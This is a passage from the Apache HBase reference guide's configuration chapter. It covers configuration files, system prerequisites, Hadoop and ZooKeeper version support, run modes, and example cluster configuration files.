HBase.\nPlease read this chapter carefully, especially the <<basic.prerequisites,Basic Prerequisites>>\nto ensure that your HBase testing and deployment goes smoothly, and prevent data loss.\nFamiliarize yourself with <<hbase_supported_tested_definitions>> as well.\n\n== Configuration Files\nApache HBase uses the same configuration system as Apache Hadoop.\nAll configuration files are located in the _conf\/_ directory, which needs to be kept in sync for each node on your cluster.\n\n.HBase Configuration File Descriptions\n_backup-masters_::\n Not present by default.\n A plain-text file which lists hosts on which the Master should start a backup Master process, one host per line.\n\n_hadoop-metrics2-hbase.properties_::\n Used to connect HBase Hadoop's Metrics2 framework.\n See the link:https:\/\/wiki.apache.org\/hadoop\/HADOOP-6728-MetricsV2[Hadoop Wiki entry] for more information on Metrics2.\n Contains only commented-out examples by default.\n\n_hbase-env.cmd_ and _hbase-env.sh_::\n Script for Windows and Linux \/ Unix environments to set up the working environment for HBase, including the location of Java, Java options, and other environment variables.\n The file contains many commented-out examples to provide guidance.\n\n_hbase-policy.xml_::\n The default policy configuration file used by RPC servers to make authorization decisions on client requests.\n Only used if HBase <<security,security>> is enabled.\n\n_hbase-site.xml_::\n The main HBase configuration file.\n This file specifies configuration options which override HBase's default configuration.\n You can view (but do not edit) the default configuration file at _docs\/hbase-default.xml_.\n You can also view the entire effective configuration for your cluster (defaults and overrides) in the [label]#HBase Configuration# tab of the HBase Web UI.\n\n_log4j.properties_::\n Configuration file for HBase logging via `log4j`.\n\n_regionservers_::\n A plain-text file containing a list of hosts which should run a RegionServer in your HBase cluster.\n By default this file contains the single entry `localhost`.\n It should contain a list of hostnames or IP addresses, one per line, and should only contain `localhost` if each node in your cluster will run a RegionServer on its `localhost` interface.\n\n.Checking XML Validity\n[TIP]\n====\nWhen you edit XML, it is a good idea to use an XML-aware editor to be sure that your syntax is correct and your XML is well-formed.\nYou can also use the `xmllint` utility to check that your XML is well-formed.\nBy default, `xmllint` re-flows and prints the XML to standard output.\nTo check for well-formedness and only print output if errors exist, use the command `xmllint -noout filename.xml`.\n====\n.Keep Configuration In Sync Across the Cluster\n[WARNING]\n====\nWhen running in distributed mode, after you make an edit to an HBase configuration, make sure you copy the contents of the _conf\/_ directory to all nodes of the cluster.\nHBase will not do this for you.\nUse `rsync`, `scp`, or another secure mechanism for copying the configuration files to your nodes.\nFor most configurations, a restart is needed for servers to pick up changes. Dynamic configuration is an exception to this, to be described later below.\n====\n\n[[basic.prerequisites]]\n== Basic Prerequisites\n\nThis section lists required services and some required system configuration.\n\n[[java]]\n.Java\n[cols=\"1,1,4\", options=\"header\"]\n|===\n|HBase Version\n|JDK 7\n|JDK 8\n\n|2.0\n|link:http:\/\/search-hadoop.com\/m\/YGbbsPxZ723m3as[Not Supported]\n|yes\n\n|1.3\n|yes\n|yes\n\n\n|1.2\n|yes\n|yes\n\n|===\n\nNOTE: HBase will neither build nor compile with Java 6.\n\nNOTE: You must set `JAVA_HOME` on each node of your cluster. _hbase-env.sh_ provides a handy mechanism to do this.\n\n[[os]]\n.Operating System Utilities\nssh::\n HBase uses the Secure Shell (ssh) command and utilities extensively to communicate between cluster nodes. Each server in the cluster must be running `ssh` so that the Hadoop and HBase daemons can be managed. You must be able to connect to all nodes via SSH, including the local node, from the Master as well as any backup Master, using a shared key rather than a password. You can see the basic methodology for such a set-up in Linux or Unix systems at \"<<passwordless.ssh.quickstart>>\". If your cluster nodes use OS X, see the section, link:https:\/\/wiki.apache.org\/hadoop\/Running_Hadoop_On_OS_X_10.5_64-bit_%28Single-Node_Cluster%29[SSH: Setting up Remote Desktop and Enabling Self-Login] on the Hadoop wiki.\n\nDNS::\n HBase uses the local hostname to self-report its IP address. Both forward and reverse DNS resolving must work in versions of HBase previous to 0.92.0. The link:https:\/\/github.com\/sujee\/hadoop-dns-checker[hadoop-dns-checker] tool can be used to verify DNS is working correctly on the cluster. The project `README` file provides detailed instructions on usage.\n\nLoopback IP::\n Prior to hbase-0.96.0, HBase only used the IP address `127.0.0.1` to refer to `localhost`, and this was not configurable.\n See <<loopback.ip,Loopback IP>> for more details.\n\nNTP::\n The clocks on cluster nodes should be synchronized. A small amount of variation is acceptable, but larger amounts of skew can cause erratic and unexpected behavior. Time synchronization is one of the first things to check if you see unexplained problems in your cluster. It is recommended that you run a Network Time Protocol (NTP) service, or another time-synchronization mechanism on your cluster and that all nodes look to the same service for time synchronization. See the link:http:\/\/www.tldp.org\/LDP\/sag\/html\/basic-ntp-config.html[Basic NTP Configuration] at [citetitle]_The Linux Documentation Project (TLDP)_ to set up NTP.\n\n[[ulimit]]\nLimits on Number of Files and Processes (ulimit)::\n Apache HBase is a database. It requires the ability to open a large number of files at once. Many Linux distributions limit the number of files a single user is allowed to open to `1024` (or `256` on older versions of OS X). You can check this limit on your servers by running the command `ulimit -n` when logged in as the user which runs HBase. See <<trouble.rs.runtime.filehandles,the Troubleshooting section>> for some of the problems you may experience if the limit is too low. You may also notice errors such as the following:\n+\n----\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Exception increateBlockOutputStream java.io.EOFException\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Abandoning block blk_-6935524980745310745_1391901\n----\n+\nIt is recommended to raise the ulimit to at least 10,000, but more likely 10,240, because the value is usually expressed in multiples of 1024. Each ColumnFamily has at least one StoreFile, and possibly more than six StoreFiles if the region is under load. The number of open files required depends upon the number of ColumnFamilies and the number of regions. The following is a rough formula for calculating the potential number of open files on a RegionServer.\n+\n.Calculate the Potential Number of Open Files\n----\n(StoreFiles per ColumnFamily) x (regions per RegionServer)\n----\n+\nFor example, assuming that a schema had 3 ColumnFamilies per region with an average of 3 StoreFiles per ColumnFamily, and there are 100 regions per RegionServer, the JVM will open `3 * 3 * 100 = 900` file descriptors, not counting open JAR files, configuration files, and others. Opening a file does not take many resources, and the risk of allowing a user to open too many files is minimal.\n+\nAnother related setting is the number of processes a user is allowed to run at once. In Linux and Unix, the number of processes is set using the `ulimit -u` command. This should not be confused with the `nproc` command, which controls the number of CPUs available to a given user. Under load, a `ulimit -u` that is too low can cause OutOfMemoryError exceptions. See Jack Levin's major HDFS issues thread on the hbase-users mailing list, from 2011.\n+\nConfiguring the maximum number of file descriptors and processes for the user who is running the HBase process is an operating system configuration, rather than an HBase configuration. It is also important to be sure that the settings are changed for the user that actually runs HBase. To see which user started HBase, and that user's ulimit configuration, look at the first line of the HBase log for that instance. A useful read setting config on your hadoop cluster is Aaron Kimball's Configuration Parameters: What can you just ignore?\n+\n.`ulimit` Settings on Ubuntu\n====\nTo configure ulimit settings on Ubuntu, edit _\/etc\/security\/limits.conf_, which is a space-delimited file with four columns. Refer to the man page for _limits.conf_ for details about the format of this file. In the following example, the first line sets both soft and hard limits for the number of open files (nofile) to 32768 for the operating system user with the username hadoop. The second line sets the number of processes to 32000 for the same user.\n----\nhadoop - nofile 32768\nhadoop - nproc 32000\n----\nThe settings are only applied if the Pluggable Authentication Module (PAM) environment is directed to use them. To configure PAM to use these limits, be sure that the _\/etc\/pam.d\/common-session_ file contains the following line:\n----\nsession required pam_limits.so\n----\n====\n\nLinux Shell::\n All of the shell scripts that come with HBase rely on the link:http:\/\/www.gnu.org\/software\/bash[GNU Bash] shell.\n\nWindows::\n Prior to HBase 0.96, running HBase on Microsoft Windows was limited only for testing purposes.\n Running production systems on Windows machines is not recommended.\n\n\n[[hadoop]]\n=== link:https:\/\/hadoop.apache.org[Hadoop](((Hadoop)))\n\nThe following table summarizes the versions of Hadoop supported with each version of HBase.\nBased on the version of HBase, you should select the most appropriate version of Hadoop.\nYou can use Apache Hadoop, or a vendor's distribution of Hadoop.\nNo distinction is made here.\nSee link:https:\/\/wiki.apache.org\/hadoop\/Distributions%20and%20Commercial%20Support[the Hadoop wiki] for information about vendors of Hadoop.\n\n.Hadoop 2.x is recommended.\n[TIP]\n====\nHadoop 2.x is faster and includes features, such as short-circuit reads, which will help improve your HBase random read profile.\nHadoop 2.x also includes important bug fixes that will improve your overall HBase experience. HBase does not support running with\nearlier versions of Hadoop. See the table below for requirements specific to different HBase versions.\n\nHadoop 3.x is still in early access releases and has not yet been sufficiently tested by the HBase community for production use cases.\n====\n\nUse the following legend to interpret this table:\n\n.Hadoop version support matrix\n\n* \"S\" = supported\n* \"X\" = not supported\n* \"NT\" = Not tested\n\n[cols=\"1,1,1,1\", options=\"header\"]\n|===\n| | HBase-1.2.x | HBase-1.3.x | HBase-2.0.x\n|Hadoop-2.0.x-alpha | X | X | X\n|Hadoop-2.1.0-beta | X | X | X\n|Hadoop-2.2.0 | X | X | X\n|Hadoop-2.3.x | X | X | X\n|Hadoop-2.4.x | S | S | X\n|Hadoop-2.5.x | S | S | X\n|Hadoop-2.6.0 | X | X | X\n|Hadoop-2.6.1+ | S | S | S\n|Hadoop-2.7.0 | X | X | X\n|Hadoop-2.7.1+ | S | S | S\n|Hadoop-2.8.[0-1] | X | X | X\n|Hadoop-2.8.2+ | NT | NT | NT\n|Hadoop-2.9.0 | X | X | X\n|Hadoop-3.0.0 | NT | NT | NT\n|===\n\n.Hadoop Pre-2.6.1 and JDK 1.8 Kerberos\n[TIP]\n====\nWhen using pre-2.6.1 Hadoop versions and JDK 1.8 in a Kerberos environment, HBase server can fail\nand abort due to Kerberos keytab relogin error. Late version of JDK 1.7 (1.7.0_80) has the problem too.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-10786[HADOOP-10786] for additional details.\nConsider upgrading to Hadoop 2.6.1+ in this case.\n====\n\n.Hadoop 2.6.x\n[TIP]\n====\nHadoop distributions based on the 2.6.x line *must* have\nlink:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-11710[HADOOP-11710] applied if you plan to run\nHBase on top of an HDFS Encryption Zone. Failure to do so will result in cluster failure and\ndata loss. This patch is present in Apache Hadoop releases 2.6.1+.\n====\n\n.Hadoop 2.y.0 Releases\n[TIP]\n====\nStarting around the time of Hadoop version 2.7.0, the Hadoop PMC got into the habit of calling out new minor releases on their major version 2 release line as not stable \/ production ready. As such, HBase expressly advises downstream users to avoid running on top of these releases. Note that additionally the 2.8.1 was release was given the same caveat by the Hadoop PMC. For reference, see the release announcements for link:https:\/\/s.apache.org\/hadoop-2.7.0-announcement[Apache Hadoop 2.7.0], link:https:\/\/s.apache.org\/hadoop-2.8.0-announcement[Apache Hadoop 2.8.0], link:https:\/\/s.apache.org\/hadoop-2.8.1-announcement[Apache Hadoop 2.8.1], and link:https:\/\/s.apache.org\/hadoop-2.9.0-announcement[Apache Hadoop 2.9.0].\n====\n\n.Replace the Hadoop Bundled With HBase!\n[NOTE]\n====\nBecause HBase depends on Hadoop, it bundles an instance of the Hadoop jar under its _lib_ directory.\nThe bundled jar is ONLY for use in standalone mode.\nIn distributed mode, it is _critical_ that the version of Hadoop that is out on your cluster match what is under HBase.\nReplace the hadoop jar found in the HBase lib directory with the hadoop jar you are running on your cluster to avoid version mismatch issues.\nMake sure you replace the jar in HBase across your whole cluster.\nHadoop version mismatch issues have various manifestations but often all look like its hung.\n====\n\n[[dfs.datanode.max.transfer.threads]]\n==== `dfs.datanode.max.transfer.threads` (((dfs.datanode.max.transfer.threads)))\n\nAn HDFS DataNode has an upper bound on the number of files that it will serve at any one time.\nBefore doing any loading, make sure you have configured Hadoop's _conf\/hdfs-site.xml_, setting the `dfs.datanode.max.transfer.threads` value to at least the following:\n\n[source,xml]\n----\n\n<property>\n <name>dfs.datanode.max.transfer.threads<\/name>\n <value>4096<\/value>\n<\/property>\n----\n\nBe sure to restart your HDFS after making the above configuration.\n\nNot having this configuration in place makes for strange-looking failures.\nOne manifestation is a complaint about missing blocks.\nFor example:\n\n----\n10\/12\/08 20:10:31 INFO hdfs.DFSClient: Could not obtain block\n blk_XXXXXXXXXXXXXXXXXXXXXX_YYYYYYYY from any node: java.io.IOException: No live nodes\n contain current block. Will get new block locations from namenode and retry...\n----\n\nSee also <<casestudies.max.transfer.threads,casestudies.max.transfer.threads>> and note that this property was previously known as `dfs.datanode.max.xcievers` (e.g. link:http:\/\/ccgtech.blogspot.com\/2010\/02\/hadoop-hdfs-deceived-by-xciever.html[Hadoop HDFS: Deceived by Xciever]).\n\n[[zookeeper.requirements]]\n=== ZooKeeper Requirements\n\nZooKeeper 3.4.x is required.\nHBase makes use of the `multi` functionality that is only available since Zookeeper 3.4.0. The `hbase.zookeeper.useMulti` configuration property defaults to `true`.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12241[HBASE-12241 (The crash of regionServer when taking deadserver's replication queue breaks replication)] and link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6775[HBASE-6775 (Use ZK.multi when available for HBASE-6710 0.92\/0.94 compatibility fix)] for background.\nThe property is deprecated and useMulti is always enabled in HBase 2.0.\n\n[[standalone_dist]]\n== HBase run modes: Standalone and Distributed\n\nHBase has two run modes: <<standalone,standalone>> and <<distributed,distributed>>.\nOut of the box, HBase runs in standalone mode.\nWhatever your mode, you will need to configure HBase by editing files in the HBase _conf_ directory.\nAt a minimum, you must edit [code]+conf\/hbase-env.sh+ to tell HBase which +java+ to use.\nIn this file you set HBase environment variables such as the heapsize and other options for the `JVM`, the preferred location for log files, etc.\nSet [var]+JAVA_HOME+ to point at the root of your +java+ install.\n\n[[standalone]]\n=== Standalone HBase\n\nThis is the default mode.\nStandalone mode is what is described in the <<quickstart,quickstart>> section.\nIn standalone mode, HBase does not use HDFS -- it uses the local filesystem instead -- and it runs all HBase daemons and a local ZooKeeper all up in the same JVM.\nZooKeeper binds to a well known port so clients may talk to HBase.\n\n[[standalone.over.hdfs]]\n==== Standalone HBase over HDFS\nA sometimes useful variation on standalone hbase has all daemons running inside the\none JVM but rather than persist to the local filesystem, instead\nthey persist to an HDFS instance.\n\nYou might consider this profile when you are intent on\na simple deploy profile, the loading is light, but the\ndata must persist across node comings and goings. Writing to\nHDFS where data is replicated ensures the latter.\n\nTo configure this standalone variant, edit your _hbase-site.xml_\nsetting _hbase.rootdir_ to point at a directory in your\nHDFS instance but then set _hbase.cluster.distributed_\nto _false_. For example:\n\n[source,xml]\n----\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>false<\/value>\n <\/property>\n<\/configuration>\n----\n\n[[distributed]]\n=== Distributed\n\nDistributed mode can be subdivided into distributed but all daemons run on a single node -- a.k.a. _pseudo-distributed_ -- and _fully-distributed_ where the daemons are spread across all nodes in the cluster.\nThe _pseudo-distributed_ vs. _fully-distributed_ nomenclature comes from Hadoop.\n\nPseudo-distributed mode can run against the local filesystem or it can run against an instance of the _Hadoop Distributed File System_ (HDFS). Fully-distributed mode can ONLY run on HDFS.\nSee the Hadoop link:https:\/\/hadoop.apache.org\/docs\/current\/[documentation] for how to set up HDFS.\nA good walk-through for setting up HDFS on Hadoop 2 can be found at http:\/\/www.alexjf.net\/blog\/distributed-systems\/hadoop-yarn-installation-definitive-guide.\n\n[[pseudo]]\n==== Pseudo-distributed\n\n.Pseudo-Distributed Quickstart\n[NOTE]\n====\nA quickstart has been added to the <<quickstart,quickstart>> chapter.\nSee <<quickstart_pseudo,quickstart-pseudo>>.\nSome of the information that was originally in this section has been moved there.\n====\n\nA pseudo-distributed mode is simply a fully-distributed mode run on a single host.\nUse this HBase configuration for testing and prototyping purposes only.\nDo not use this configuration for production or for performance evaluation.\n\n[[fully_dist]]\n=== Fully-distributed\n\nBy default, HBase runs in standalone mode.\nBoth standalone mode and pseudo-distributed mode are provided for the purposes of small-scale testing.\nFor a production environment, distributed mode is advised.\nIn distributed mode, multiple instances of HBase daemons run on multiple servers in the cluster.\n\nJust as in pseudo-distributed mode, a fully distributed configuration requires that you set the `hbase.cluster.distributed` property to `true`.\nTypically, the `hbase.rootdir` is configured to point to a highly-available HDFS filesystem.\n\nIn addition, the cluster is configured so that multiple cluster nodes enlist as RegionServers, ZooKeeper QuorumPeers, and backup HMaster servers.\nThese configuration basics are all demonstrated in <<quickstart_fully_distributed,quickstart-fully-distributed>>.\n\n.Distributed RegionServers\nTypically, your cluster will contain multiple RegionServers all running on different servers, as well as primary and backup Master and ZooKeeper daemons.\nThe _conf\/regionservers_ file on the master server contains a list of hosts whose RegionServers are associated with this cluster.\nEach host is on a separate line.\nAll hosts listed in this file will have their RegionServer processes started and stopped when the master server starts or stops.\n\n.ZooKeeper and HBase\nSee the <<zookeeper,ZooKeeper>> section for ZooKeeper setup instructions for HBase.\n\n.Example Distributed HBase Cluster\n====\nThis is a bare-bones _conf\/hbase-site.xml_ for a distributed HBase cluster.\nA cluster that is used for real-world work would contain more custom configuration parameters.\nMost HBase configuration directives have default values, which are used unless the value is overridden in the _hbase-site.xml_.\nSee \"<<config.files,Configuration Files>>\" for more information.\n\n[source,xml]\n----\n\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <\/property>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>node-a.example.com,node-b.example.com,node-c.example.com<\/value>\n <\/property>\n<\/configuration>\n----\n\nThis is an example _conf\/regionservers_ file, which contains a list of nodes that should run a RegionServer in the cluster.\nThese nodes need HBase installed and they need to use the same contents of the _conf\/_ directory as the Master server\n\n[source]\n----\n\nnode-a.example.com\nnode-b.example.com\nnode-c.example.com\n----\n\nThis is an example _conf\/backup-masters_ file, which contains a list of each node that should run a backup Master instance.\nThe backup Master instances will sit idle unless the main Master becomes unavailable.\n\n[source]\n----\n\nnode-b.example.com\nnode-c.example.com\n----\n====\n\n.Distributed HBase Quickstart\nSee <<quickstart_fully_distributed,quickstart-fully-distributed>> for a walk-through of a simple three-node cluster configuration with multiple ZooKeeper, backup HMaster, and RegionServer instances.\n\n.Procedure: HDFS Client Configuration\n. Of note, if you have made HDFS client configuration changes on your Hadoop cluster, such as configuration directives for HDFS clients, as opposed to server-side configurations, you must use one of the following methods to enable HBase to see and use these configuration changes:\n+\na. Add a pointer to your `HADOOP_CONF_DIR` to the `HBASE_CLASSPATH` environment variable in _hbase-env.sh_.\nb. Add a copy of _hdfs-site.xml_ (or _hadoop-site.xml_) or, better, symlinks, under _${HBASE_HOME}\/conf_, or\nc. if only a small set of HDFS client configurations, add them to _hbase-site.xml_.\n\n\nAn example of such an HDFS client configuration is `dfs.replication`.\nIf for example, you want to run with a replication factor of 5, HBase will create files with the default of 3 unless you do the above to make the configuration available to HBase.\n\n[[confirm]]\n== Running and Confirming Your Installation\n\nMake sure HDFS is running first.\nStart and stop the Hadoop HDFS daemons by running _bin\/start-hdfs.sh_ over in the `HADOOP_HOME` directory.\nYou can ensure it started properly by testing the `put` and `get` of files into the Hadoop filesystem.\nHBase does not normally use the MapReduce or YARN daemons. These do not need to be started.\n\n_If_ you are managing your own ZooKeeper, start it and confirm it's running, else HBase will start up ZooKeeper for you as part of its start process.\n\nStart HBase with the following command:\n\n----\nbin\/start-hbase.sh\n----\n\nRun the above from the `HBASE_HOME` directory.\n\nYou should now have a running HBase instance.\nHBase logs can be found in the _logs_ subdirectory.\nCheck them out especially if HBase had trouble starting.\n\nHBase also puts up a UI listing vital attributes.\nBy default it's deployed on the Master host at port 16010 (HBase RegionServers listen on port 16020 by default and put up an informational HTTP server at port 16030). If the Master is running on a host named `master.example.org` on the default port, point your browser at pass:[http:\/\/master.example.org:16010] to see the web interface.\n\nOnce HBase has started, see the <<shell_exercises,shell exercises>> section for how to create tables, add data, scan your insertions, and finally disable and drop your tables.\n\nTo stop HBase after exiting the HBase shell enter\n\n----\n$ .\/bin\/stop-hbase.sh\nstopping hbase...............\n----\n\nShutdown can take a moment to complete.\nIt can take longer if your cluster is comprised of many machines.\nIf you are running a distributed operation, be sure to wait until HBase has shut down completely before stopping the Hadoop daemons.\n\n[[config.files]]\n== Default Configuration\n\n[[hbase.site]]\n=== _hbase-site.xml_ and _hbase-default.xml_\n\nJust as in Hadoop where you add site-specific HDFS configuration to the _hdfs-site.xml_ file, for HBase, site specific customizations go into the file _conf\/hbase-site.xml_.\nFor the list of configurable properties, see <<hbase_default_configurations,hbase default configurations>> below or view the raw _hbase-default.xml_ source file in the HBase source code at _src\/main\/resources_.\n\nNot all configuration options make it out to _hbase-default.xml_.\nSome configurations would only appear in source code; the only way to identify these changes are through code review.\n\nCurrently, changes here will require a cluster restart for HBase to notice the change.\n\/\/ hbase\/src\/main\/asciidoc\n\/\/\ninclude::{docdir}\/..\/..\/..\/target\/asciidoc\/hbase-default.adoc[]\n\n\n[[hbase.env.sh]]\n=== _hbase-env.sh_\n\nSet HBase environment variables in this file.\nExamples include options to pass the JVM on start of an HBase daemon such as heap size and garbage collector configs.\nYou can also set configurations for HBase configuration, log directories, niceness, ssh options, where to locate process pid files, etc.\nOpen the file at _conf\/hbase-env.sh_ and peruse its content.\nEach option is fairly well documented.\nAdd your own environment variables here if you want them read by HBase daemons on startup.\n\nChanges here will require a cluster restart for HBase to notice the change.\n\n[[log4j]]\n=== _log4j.properties_\n\nEdit this file to change rate at which HBase files are rolled and to change the level at which HBase logs messages.\n\nChanges here will require a cluster restart for HBase to notice the change though log levels can be changed for particular daemons via the HBase UI.\n\n[[client_dependencies]]\n=== Client configuration and dependencies connecting to an HBase cluster\n\nIf you are running HBase in standalone mode, you don't need to configure anything for your client to work provided that they are all on the same machine.\n\nSince the HBase Master may move around, clients bootstrap by looking to ZooKeeper for current critical locations.\nZooKeeper is where all these values are kept.\nThus clients require the location of the ZooKeeper ensemble before they can do anything else.\nUsually this ensemble location is kept out in the _hbase-site.xml_ and is picked up by the client from the `CLASSPATH`.\n\nIf you are configuring an IDE to run an HBase client, you should include the _conf\/_ directory on your classpath so _hbase-site.xml_ settings can be found (or add _src\/test\/resources_ to pick up the hbase-site.xml used by tests).\n\nMinimally, an HBase client needs hbase-client module in its dependencies when connecting to a cluster:\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.hbase<\/groupId>\n <artifactId>hbase-client<\/artifactId>\n <version>1.2.4<\/version>\n<\/dependency>\n----\n\nA basic example _hbase-site.xml_ for client only may look as follows:\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>The directory shared by region servers.\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[java.client.config]]\n==== Java client configuration\n\nThe configuration used by a Java client is kept in an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HBaseConfiguration[HBaseConfiguration] instance.\n\nThe factory method on HBaseConfiguration, `HBaseConfiguration.create();`, on invocation, will read in the content of the first _hbase-site.xml_ found on the client's `CLASSPATH`, if one is present (Invocation will also factor in any _hbase-default.xml_ found; an _hbase-default.xml_ ships inside the _hbase.X.X.X.jar_). It is also possible to specify configuration directly without having to read from a _hbase-site.xml_.\nFor example, to set the ZooKeeper ensemble for the cluster programmatically do as follows:\n\n[source,java]\n----\nConfiguration config = HBaseConfiguration.create();\nconfig.set(\"hbase.zookeeper.quorum\", \"localhost\"); \/\/ Here we are running zookeeper locally\n----\n\nIf multiple ZooKeeper instances make up your ZooKeeper ensemble, they may be specified in a comma-separated list (just as in the _hbase-site.xml_ file). This populated `Configuration` instance can then be passed to an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], and so on.\n\n[[config_timeouts]]\n=== Timeout settings\n\nHBase provides many timeout settings to limit the execution time of different remote operations.\n\nThe `hbase.rpc.timeout` property limits how long an RPC call can run before it times out.\nYou can also specify a timeout for read and write operations using `hbase.rpc.read.timeout` and `hbase.rpc.write.timeout` configuration properties. In the absence of these properties `hbase.rpc.timeout` will be used.\nA higher-level timeout is `hbase.client.operation.timeout` which is valid for each client call.\nTimeout for scan operations is controlled differently. To set it you can use `hbase.client.scanner.timeout.period` property.\n\n[[example_config]]\n== Example Configurations\n\n=== Basic Distributed HBase Install\n\nHere is a basic configuration example for a distributed ten node cluster:\n* The nodes are named `example0`, `example1`, etc., through node `example9` in this example.\n* The HBase Master and the HDFS NameNode are running on the node `example0`.\n* RegionServers run on nodes `example1`-`example9`.\n* A 3-node ZooKeeper ensemble runs on `example1`, `example2`, and `example3` on the default ports.\n* ZooKeeper data is persisted to the directory _\/export\/zookeeper_.\n\nBelow we show what the main configuration files -- _hbase-site.xml_, _regionservers_, and _hbase-env.sh_ -- found in the HBase _conf_ directory might look like.\n\n[[hbase_site]]\n==== _hbase-site.xml_\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>The directory shared by RegionServers.\n <\/description>\n <\/property>\n <property>\n <name>hbase.zookeeper.property.dataDir<\/name>\n <value>\/export\/zookeeper<\/value>\n <description>Property from ZooKeeper config zoo.cfg.\n The directory where the snapshot is stored.\n <\/description>\n <\/property>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/example0:8020\/hbase<\/value>\n <description>The directory shared by RegionServers.\n <\/description>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <description>The mode the cluster will be in. Possible values are\n false: standalone and pseudo-distributed setups with managed ZooKeeper\n true: fully-distributed with unmanaged ZooKeeper Quorum (see hbase-env.sh)\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[regionservers]]\n==== _regionservers_\n\nIn this file you list the nodes that will run RegionServers.\nIn our case, these nodes are `example1`-`example9`.\n\n[source]\n----\nexample1\nexample2\nexample3\nexample4\nexample5\nexample6\nexample7\nexample8\nexample9\n----\n\n[[hbase_env]]\n==== _hbase-env.sh_\n\nThe following lines in the _hbase-env.sh_ file show how to set the `JAVA_HOME` environment variable (required for HBase) and set the heap to 4 GB (rather than the default value of 1 GB). If you copy and paste this example, be sure to adjust the `JAVA_HOME` to suit your environment.\n\n----\n# The java implementation to use.\nexport JAVA_HOME=\/usr\/java\/jdk1.8.0\/\n\n# The maximum amount of heap to use. Default is left to JVM default.\nexport HBASE_HEAPSIZE=4G\n----\n\nUse +rsync+ to copy the content of the _conf_ directory to all nodes of the cluster.\n\n[[important_configurations]]\n== The Important Configurations\n\nBelow we list some _important_ configurations.\nWe've divided this section into required configuration and worth-a-look recommended configs.\n\n[[required_configuration]]\n=== Required Configurations\n\nReview the <<os,os>> and <<hadoop,hadoop>> sections.\n\n[[big.cluster.config]]\n==== Big Cluster Configurations\n\nIf you have a cluster with a lot of regions, it is possible that a Regionserver checks in briefly after the Master starts while all the remaining RegionServers lag behind. This first server to check in will be assigned all regions which is not optimal.\nTo prevent the above scenario from happening, up the `hbase.master.wait.on.regionservers.mintostart` property from its default value of 1.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6389[HBASE-6389 Modify the\n conditions to ensure that Master waits for sufficient number of Region Servers before\n starting region assignments] for more detail.\n\n[[recommended_configurations]]\n=== Recommended Configurations\n\n[[recommended_configurations.zk]]\n==== ZooKeeper Configuration\n\n[[sect.zookeeper.session.timeout]]\n===== `zookeeper.session.timeout`\n\nThe default timeout is three minutes (specified in milliseconds). This means that if a server crashes, it will be three minutes before the Master notices the crash and starts recovery.\nYou might need to tune the timeout down to a minute or even less so the Master notices failures sooner.\nBefore changing this value, be sure you have your JVM garbage collection configuration under control, otherwise, a long garbage collection that lasts beyond the ZooKeeper session timeout will take out your RegionServer. (You might be fine with this -- you probably want recovery to start on the server if a RegionServer has been in GC for a long period of time).\n\nTo change this configuration, edit _hbase-site.xml_, copy the changed file across the cluster and restart.\n\nWe set this value high to save our having to field questions up on the mailing lists asking why a RegionServer went down during a massive import.\nThe usual cause is that their JVM is untuned and they are running into long GC pauses.\nOur thinking is that while users are getting familiar with HBase, we'd save them having to know all of its intricacies.\nLater when they've built some confidence, then they can play with configuration such as this.\n\n[[zookeeper.instances]]\n===== Number of ZooKeeper Instances\n\nSee <<zookeeper,zookeeper>>.\n\n[[recommended.configurations.hdfs]]\n==== HDFS Configurations\n\n[[dfs.datanode.failed.volumes.tolerated]]\n===== `dfs.datanode.failed.volumes.tolerated`\n\nThis is the \"...number of volumes that are allowed to fail before a DataNode stops offering service.\nBy default any volume failure will cause a datanode to shutdown\" from the _hdfs-default.xml_ description.\nYou might want to set this to about half the amount of your available disks.\n\n[[hbase.regionserver.handler.count]]\n===== `hbase.regionserver.handler.count`\n\nThis setting defines the number of threads that are kept open to answer incoming requests to user tables.\nThe rule of thumb is to keep this number low when the payload per request approaches the MB (big puts, scans using a large cache) and high when the payload is small (gets, small puts, ICVs, deletes). The total size of the queries in progress is limited by the setting `hbase.ipc.server.max.callqueue.size`.\n\nIt is safe to set that number to the maximum number of incoming clients if their payload is small, the typical example being a cluster that serves a website since puts aren't typically buffered and most of the operations are gets.\n\nThe reason why it is dangerous to keep this setting high is that the aggregate size of all the puts that are currently happening in a region server may impose too much pressure on its memory, or even trigger an OutOfMemoryError.\nA RegionServer running on low memory will trigger its JVM's garbage collector to run more frequently up to a point where GC pauses become noticeable (the reason being that all the memory used to keep all the requests' payloads cannot be trashed, no matter how hard the garbage collector tries). After some time, the overall cluster throughput is affected since every request that hits that RegionServer will take longer, which exacerbates the problem even more.\n\nYou can get a sense of whether you have too little or too many handlers by <<rpc.logging,rpc.logging>> on an individual RegionServer then tailing its logs (Queued requests consume memory).\n\n[[big_memory]]\n==== Configuration for large memory machines\n\nHBase ships with a 